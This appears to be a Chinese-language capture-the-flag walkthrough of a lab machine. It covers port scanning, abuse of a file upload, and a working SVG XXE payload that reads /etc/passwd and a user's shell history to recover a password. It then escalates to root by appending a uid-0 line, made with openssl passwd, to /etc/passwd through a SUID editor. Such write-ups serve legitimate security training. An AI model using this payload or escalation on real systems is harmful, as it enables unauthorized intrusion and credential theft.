主机层面扫描：

22 和 3306 端口

3306 端口默认是MySQL端口，但是这里尝试爆破报错，最后通http访问发现非MySQL协议，而是一个http的服务

http的协议我们进行目录枚举下

枚举到一个长传的点，我们试试访问下

http://10.10.202.10:3306/upload.html

上传反向shell试试

通过前段绕过svg的格式文件，上传PHP shell 失败，错误页面。

 这里使用svg xxe 注入 漏洞

https://insinuator.net/2015/03/xxe-injection-in-apache-batik-library-cve-2015-0250/

payload：

<?xml version="1.0" standalone="yes"?><!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><svg width="500px" height="40px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">&xxe;</svg>

以上内容保存到svgxxe.svg 文件中，尝试上传下

右键源代码查看

这里我们尝试读取下用户的历史命令，尝试看看是够有用户凭证啥的

这里就读取： /home/employee/.ash_history

└──? $sudo useradd -h | grep "\-p"
sudo: unable to resolve host HACK404: Name or service not known
  -p, --password PASSWORD       encrypted password of the new account

 所以这里的-p参数后面的字符串，应该是用户employee的密码

SSHD登陆

进行提权操作

minuv2:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/micro
/bin/bbsuid
minuv2:~$
这里经过尝试可以使用micro来编辑passwd文件，可以尝试提权操作。

本地生成密码对应的hash值

$openssl passwd -1 -salt hack404 hack404123
$1$hack404$FyYmBA.v/Hgs60rVCMtiN1

 增加hash值到passwd文件

hack404:$1$hack404$FyYmBA.v/Hgs60rVCMtiN1:0:0:root:root:/bin/ash

增加之后，按ESC键，然后输入y，保存名称为： /etc/passwd

完结！